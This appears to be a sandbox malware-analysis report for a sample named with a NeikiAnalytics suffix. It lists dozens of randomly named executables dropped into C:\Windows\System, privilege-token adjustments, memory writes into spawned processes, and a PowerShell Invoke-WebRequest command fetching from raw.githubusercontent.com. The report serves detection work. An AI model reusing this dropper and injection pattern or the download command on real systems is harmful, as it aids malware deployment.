File created C:\Windows\System\XmBNMBC.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\CAUYutz.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\OUHTJmG.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\WwCGkAM.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\WpujVNZ.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\KMntbhG.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\JtEMkjJ.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\qhyXNbU.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\lIANwTo.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\BTDHiMe.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\DuFnReI.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\CmXhZNI.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\ySwVtNN.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\AYgvbKf.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\tKLaDwc.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\ynYqUOU.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\Wzxalnz.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\hrUlmDu.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\SEcKdeV.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\lYBlyqK.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\EKcCmno.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\rLaZoSh.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\yXvtKKa.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZCKDDzf.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\slSeXYJ.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\MiJeieS.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\IcbUKzd.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\bOKNZcH.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZhcENVz.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\mSjQdnY.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\MjoCKIq.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\dlyJIWk.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\DXaMCLB.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\wadBoFt.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\pBTBRZo.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\gPeSTgG.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\NlcEBPH.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\ARwuXFV.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\INwTlIv.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\gpKisCM.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\LsrOODI.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\LfnhYTe.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\kjnBVjM.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\shssEQf.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\GcqXAUE.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\JkZuweR.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\AKojcut.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\TcTyVHz.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\MYXlEsl.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\whSbYed.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\uKWSLUY.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\tVOmRnu.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\NfAaFAj.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\SoHVWKX.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\BZnXgKq.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\THTzoFb.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZxTDQgx.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
File created C:\Windows\System\IhmuZPA.exe C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2360 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\uovhQRo.exe
PID 2360 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\uovhQRo.exe
PID 2360 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\oLNmthv.exe
PID 2360 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\oLNmthv.exe
PID 2360 wrote to memory of 3540 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\OwnCKSw.exe
PID 2360 wrote to memory of 3540 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\OwnCKSw.exe
PID 2360 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\GAJQbVP.exe
PID 2360 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\GAJQbVP.exe
PID 2360 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\DYAbeqw.exe
PID 2360 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\DYAbeqw.exe
PID 2360 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\gRsstgN.exe
PID 2360 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\gRsstgN.exe
PID 2360 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\YfFaJbS.exe
PID 2360 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\YfFaJbS.exe
PID 2360 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\wScrOdp.exe
PID 2360 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\wScrOdp.exe
PID 2360 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\jxHATNe.exe
PID 2360 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\jxHATNe.exe
PID 2360 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\YzoTkNO.exe
PID 2360 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\YzoTkNO.exe
PID 2360 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\lBmpuPL.exe
PID 2360 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\lBmpuPL.exe
PID 2360 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\wekQPAW.exe
PID 2360 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\wekQPAW.exe
PID 2360 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\ngByfzP.exe
PID 2360 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\ngByfzP.exe
PID 2360 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\IlktpFw.exe
PID 2360 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\IlktpFw.exe
PID 2360 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\tsdBcMM.exe
PID 2360 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\tsdBcMM.exe
PID 2360 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\vurWFkZ.exe
PID 2360 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\vurWFkZ.exe
PID 2360 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\kdOMOzv.exe
PID 2360 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\kdOMOzv.exe
PID 2360 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\JkZTslb.exe
PID 2360 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\JkZTslb.exe
PID 2360 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\yfsWgNT.exe
PID 2360 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\yfsWgNT.exe
PID 2360 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\GgksSUO.exe
PID 2360 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\GgksSUO.exe
PID 2360 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\rUFTdzm.exe
PID 2360 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\rUFTdzm.exe
PID 2360 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\VpjOQtz.exe
PID 2360 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\VpjOQtz.exe
PID 2360 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\HQFQxDe.exe
PID 2360 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\HQFQxDe.exe
PID 2360 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\QMrKWRF.exe
PID 2360 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\QMrKWRF.exe
PID 2360 wrote to memory of 3860 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\YMWjuHR.exe
PID 2360 wrote to memory of 3860 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\YMWjuHR.exe
PID 2360 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\KEkdQvA.exe
PID 2360 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\KEkdQvA.exe
PID 2360 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\YjneNxN.exe
PID 2360 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\YjneNxN.exe
PID 2360 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\vaXNldY.exe
PID 2360 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\vaXNldY.exe
PID 2360 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\CKWOPeF.exe
PID 2360 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\CKWOPeF.exe
PID 2360 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\LhMeRPz.exe
PID 2360 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\LhMeRPz.exe
PID 2360 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\mDznAKu.exe
PID 2360 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe C:\Windows\System\mDznAKu.exe

Processes

C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\bdec56ca6b3cdf4adb17f92c2e7ca100_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\uovhQRo.exe

C:\Windows\System\uovhQRo.exe

C:\Windows\System\oLNmthv.exe

C:\Windows\System\oLNmthv.exe

C:\Windows\System\OwnCKSw.exe

C:\Windows\System\OwnCKSw.exe

C:\Windows\System\GAJQbVP.exe

C:\Windows\System\GAJQbVP.exe

C:\Windows\System\DYAbeqw.exe

C:\Windows\System\DYAbeqw.exe

C:\Windows\System\gRsstgN.exe

C:\Windows\System\gRsstgN.exe

C:\Windows\System\YfFaJbS.exe

C:\Windows\System\YfFaJbS.exe

C:\Windows\System\wScrOdp.exe

C:\Windows\System\wScrOdp.exe

C:\Windows\System\jxHATNe.exe

C:\Windows\System\jxHATNe.exe

C:\Windows\System\YzoTkNO.exe

C:\Windows\System\YzoTkNO.exe

C:\Windows\System\lBmpuPL.exe

C:\Windows\System\lBmpuPL.exe

C:\Windows\System\wekQPAW.exe

C:\Windows\System\wekQPAW.exe

C:\Windows\System\ngByfzP.exe

C:\Windows\System\ngByfzP.exe

C:\Windows\System\IlktpFw.exe

C:\Windows\System\IlktpFw.exe

C:\Windows\System\tsdBcMM.exe

C:\Windows\System\tsdBcMM.exe

C:\Windows\System\vurWFkZ.exe

C:\Windows\System\vurWFkZ.exe

C:\Windows\System\kdOMOzv.exe

C:\Windows\System\kdOMOzv.exe

C:\Windows\System\JkZTslb.exe

C:\Windows\System\JkZTslb.exe

C:\Windows\System\yfsWgNT.exe

C:\Windows\System\yfsWgNT.exe

C:\Windows\System\GgksSUO.exe

C:\Windows\System\GgksSUO.exe

C:\Windows\System\rUFTdzm.exe

C:\Windows\System\rUFTdzm.exe

C:\Windows\System\VpjOQtz.exe

C:\Windows\System\VpjOQtz.exe

C:\Windows\System\HQFQxDe.exe

C:\Windows\System\HQFQxDe.exe

C:\Windows\System\QMrKWRF.exe

C:\Windows\System\QMrKWRF.exe

C:\Windows\System\YMWjuHR.exe

C:\Windows\System\YMWjuHR.exe

C:\Windows\System\KEkdQvA.exe

C:\Windows\System\KEkdQvA.exe

C:\Windows\System\YjneNxN.exe

C:\Windows\System\YjneNxN.exe

C:\Windows\System\vaXNldY.exe

C:\Windows\System\vaXNldY.exe

C:\Windows\System\CKWOPeF.exe

C:\Windows\System\CKWOPeF.exe

C:\Windows\System\LhMeRPz.exe

C:\Windows\System\LhMeRPz.exe

C:\Windows\System\mDznAKu.exe

C:\Windows\System\mDznAKu.exe

C:\Windows\System\aWVCqTM.exe

C:\Windows\System\aWVCqTM.exe

C:\Windows\System\GwQeDhw.exe

C:\Windows\System\GwQeDhw.exe

C:\Windows\System\RUYjrnT.exe

C:\Windows\System\RUYjrnT.exe

C:\Windows\System\cpMTVYV.exe

C:\Windows\System\cpMTVYV.exe

C:\Windows\System\qSZgnIe.exe

C:\Windows\System\qSZgnIe.exe

C:\Windows\System\VYJIXWa.exe

C:\Windows\System\VYJIXWa.exe

C:\Windows\System\SecAVTG.exe

C:\Windows\System\SecAVTG.exe

C:\Windows\System\UudbGTU.exe

C:\Windows\System\UudbGTU.exe

C:\Windows\System\wbOTkBr.exe

C:\Windows\System\wbOTkBr.exe

C:\Windows\System\DyUXyZz.exe

C:\Windows\System\DyUXyZz.exe

C:\Windows\System\RMbDlTT.exe

C:\Windows\System\RMbDlTT.exe

C:\Windows\System\NmBxnIq.exe

C:\Windows\System\NmBxnIq.exe

C:\Windows\System\mGAYOWf.exe

C:\Windows\System\mGAYOWf.exe

C:\Windows\System\KYqyAvF.exe

C:\Windows\System\KYqyAvF.exe

C:\Windows\System\sgfAQFp.exe

C:\Windows\System\sgfAQFp.exe

C:\Windows\System\HOrdfBW.exe

C:\Windows\System\HOrdfBW.exe

C:\Windows\System\PDfqhlR.exe

C:\Windows\System\PDfqhlR.exe

C:\Windows\System\yxSrcEG.exe

C:\Windows\System\yxSrcEG.exe

C:\Windows\System\hZuIvsN.exe

C:\Windows\System\hZuIvsN.exe

C:\Windows\System\frBtwsH.exe

C:\Windows\System\frBtwsH.exe

C:\Windows\System\FQALVgt.exe

C:\Windows\System\FQALVgt.exe

C:\Windows\System\vaUNJqe.exe

C:\Windows\System\vaUNJqe.exe

C:\Windows\System\AOeomQK.exe

C:\Windows\System\AOeomQK.exe

C:\Windows\System\MKltZhj.exe

C:\Windows\System\MKltZhj.exe

C:\Windows\System\OVfuAah.exe

C:\Windows\System\OVfuAah.exe

C:\Windows\System\cCccyog.exe

C:\Windows\System\cCccyog.exe

C:\Windows\System\xKMSrui.exe

C:\Windows\System\xKMSrui.exe

C:\Windows\System\BtHPgHh.exe

C:\Windows\System\BtHPgHh.exe

C:\Windows\System\JXGblkP.exe

C:\Windows\System\JXGblkP.exe

C:\Windows\System\IaKFLHi.exe

C:\Windows\System\IaKFLHi.exe

C:\Windows\System\RrjZTis.exe

C:\Windows\System\RrjZTis.exe

C:\Windows\System\VOYOKYP.exe

C:\Windows\System\VOYOKYP.exe

C:\Windows\System\DJTXKeu.exe

C:\Windows\System\DJTXKeu.exe

C:\Windows\System\GSIzkTr.exe

C:\Windows\System\GSIzkTr.exe

C:\Windows\System\QzEIqfU.exe

C:\Windows\System\QzEIqfU.exe

C:\Windows\System\opIOtUA.exe

C:\Windows\System\opIOtUA.exe

C:\Windows\System\yudKldc.exe

C:\Windows\System\yudKldc.exe

C:\Windows\System\MUrMqYQ.exe

C:\Windows\System\MUrMqYQ.exe

C:\Windows\System\CYbxGMu.exe

C:\Windows\System\CYbxGMu.exe

C:\Windows\System\eavgQYo.exe

C:\Windows\System\eavgQYo.exe

C:\Windows\System\vMEqFKA.exe

C:\Windows\System\vMEqFKA.exe

C:\Windows\System\bmtjgbg.exe

C:\Windows\System\bmtjgbg.exe

C:\Windows\System\mohTXYi.exe

C:\Windows\System\mohTXYi.exe

C:\Windows\System\LrNVDXp.exe

C:\Windows\System\LrNVDXp.exe

C:\Windows\System\XCDnFFa.exe

C:\Windows\System\XCDnFFa.exe

C:\Windows\System\HpGOoWR.exe

C:\Windows\System\HpGOoWR.exe

C:\Windows\System\laCQmku.exe

C:\Windows\System\laCQmku.exe

C:\Windows\System\qdaUPGB.exe

C:\Windows\System\qdaUPGB.exe

C:\Windows\System\JTbnYRc.exe

C:\Windows\System\JTbnYRc.exe

C:\Windows\System\JIctuIV.exe

C:\Windows\System\JIctuIV.exe

C:\Windows\System\ALbznzJ.exe

C:\Windows\System\ALbznzJ.exe

C:\Windows\System\xyCqfYL.exe

C:\Windows\System\xyCqfYL.exe

C:\Windows\System\tHOJJUc.exe

C:\Windows\System\tHOJJUc.exe

C:\Windows\System\aTOqCow.exe

C:\Windows\System\aTOqCow.exe

